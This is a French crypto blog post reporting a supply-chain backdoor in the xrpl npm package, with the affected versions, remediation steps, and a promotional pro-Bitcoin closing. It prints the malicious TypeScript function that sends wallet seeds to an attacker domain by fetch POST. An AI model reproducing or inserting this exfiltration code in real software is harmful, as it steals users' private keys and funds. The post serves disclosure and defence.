Le réseau XRP Ledger (XRPL), au cœur de l’écosystème Ripple, vient d’être la cible d’une attaque sophistiquée de type supply chain (chaîne d’approvisionnement). Un backdoor a été introduit dans le package officiel xrpl sur le gestionnaire de paquets NPM, compromettant potentiellement des centaines de milliers de portefeuilles et d’applications dans l’écosystème XRP.

Une attaque sournoise identifiée le 21 avril

Tout commence le 21 avril 2025 à 20h53 GMT. Le système de surveillance Aikido Intel, spécialisé dans la détection de menaces sur les écosystèmes open source, détecte cinq nouvelles versions du package xrpl, SDK officiel utilisé pour interagir avec le XRP Ledger. Un détail saute immédiatement aux yeux : ces versions ne correspondent à aucun tag officiel publié sur le GitHub de Ripple, dont la dernière version était la 4.2.0.

L’utilisateur ayant publié ces nouvelles versions – 4.2.1, 4.2.2, 4.2.3, 4.2.4 et même 2.14.2 – ne semble pas faire partie de l’équipe légitime. Et très vite, l’analyse révèle un code malveillant inséré dans la librairie.

Analyse technique : un backdoor bien dissimulé

Le fichier src/index.ts des versions malveillantes contient une fonction intrigante :

const validSeeds = new Set([]);
export function checkValidityOfSeed(seed: string) {
if (validSeeds.has(seed)) return;
validSeeds.add(seed);
fetch(« https://0x9c[.]xyz/xc », { method: ‘POST’, headers: { ‘ad-referral’: seed, } })
}

Cette fonction envoie discrètement les clés privées (ou seeds) à un domaine externe (0x9c.xyz). Elle est appelée de manière automatique lors de l’instanciation de portefeuilles (Wallet) dans plusieurs fonctions critiques du SDK, telles que :

• fromSeed()
• fromMnemonic()
• generate()
• fromEntropy()
• deriveWallet()

Autrement dit, toute application utilisant le SDK compromis pour créer ou gérer des portefeuilles XRP expose les clés privées de ses utilisateurs au pirate.

Qui est touché et comment réagir ?

Si vous avez utilisé l’un des packages suivants entre le 21 avril à 20h53 GMT et le 22 avril à 13h00 GMT, vous devez considérer vos clés privées comme compromises :

• xrpl@4.2.1
• xrpl@4.2.2
• xrpl@4.2.3
• xrpl@4.2.4
• xrpl@2.14.2

✅ Vous devez immédiatement :

• Mettre à jour vers xrpl@4.2.5 (version propre publiée par l’équipe XRP Ledger),
• Révoquer toute clé privée exposée et transférer vos fonds vers un nouveau portefeuille,
• Vérifier les connexions réseau sortantes vers 0x9c.xyz ou tout comportement suspect.

🛠️ Mesures prises par Ripple et la fondation XRP Ledger

Face à cette menace, l’équipe de développement de XRP Ledger a agi rapidement :

• Suppression immédiate des versions malveillantes sur NPM,
• Publication d’un correctif en urgence (4.2.5),
• Notification officielle recommandant à tous les développeurs d’effectuer la mise à jour,
• Promesse d’un rapport post-mortem complet.

Selon la XRP Ledger Foundation, cette vulnérabilité est limitée à la librairie JavaScript xrpl.js et ne concerne ni la blockchain XRP elle-même, ni le code C++ du ledger ou son référentiel GitHub principal.

💥 Un exemple classique de supply chain attack

Ce type d’attaque – où le pirate insère un malware dans un composant logiciel largement utilisé – est l’un des scénarios les plus redoutés de la cybersécurité moderne. Le cas de XRP est particulièrement sensible car :

• Le package xrpl est téléchargé plus de 140 000 fois par semaine,
• Il est utilisé par des centaines de projets tiers, exchanges, portefeuilles et applications web,
• Le code malveillant était intégré de manière progressive, entre les versions 4.2.1 et 4.2.4, suggérant une tentative de rester discret.

🌐 Que retenir de cette affaire ?

La sécurité dans les projets blockchain ne concerne pas uniquement les blockchains elles-mêmes, mais aussi l’ensemble de l’environnement logiciel qui permet aux utilisateurs d’y interagir.

Dans ce cas, un pirate a réussi à injecter une porte dérobée dans un SDK largement utilisé, sans modifier le code officiel sur GitHub. Cette attaque aurait pu passer totalement inaperçue sans la vigilance d’outils comme Aikido Intel.

👉 🔍 DUC Mon Avis : un avertissement pour tout l’écosystème

Cette affaire XRP est un rappel brutal : même les projets bien établis peuvent être vulnérables à des attaques via leurs dépendances logicielles. Et cela n’épargne personne. Ce type d’incident souligne aussi l’importance croissante des auditeurs de sécurité spécialisés dans les chaînes logicielles.

Bitcoin, avec son architecture robuste, son code minimaliste, et son absence de dépendances JavaScript critiques, démontre ici encore sa supériorité structurelle. Plus que jamais, la souveraineté numérique commence par la sécurité. Et dans cet environnement, Bitcoin reste la référence antifragile.

✍️ Rédigé par DUC
📌 Source : Aikido Security – Analyse complète ici
📌 Code XRP Ledger sur GitHub : https://github.com/XRPLF/xrpl.js
📌 Mise à jour officielle : xrpl@4.2.5 sur NPM

🚀 Rejoignez-moi sur YouTube et Twitch pour plus de contenu exclusif !

📢Prendre des décisions informées dans cet univers passionnant ! Comprendre, Apprendre, Réussir…

• 👉 YouTube Actualités : DUC Bitcoin
• 👉 Twitch : DUC Bitcoin Live

🔔 Abonnez-vous et activez les notifications pour ne manquer aucun contenu :

• Sur YouTube : Toutes les actualités Bitcoin. Un oeil sur tout le Web3
• Sur Twitch : Des lives interactifs, des Q&A, et des discussions en temps réel sur Bitcoin (politiques , techniques, minages etc) et les mouvements du marché des cryptomonnaies.

À bientôt, DUC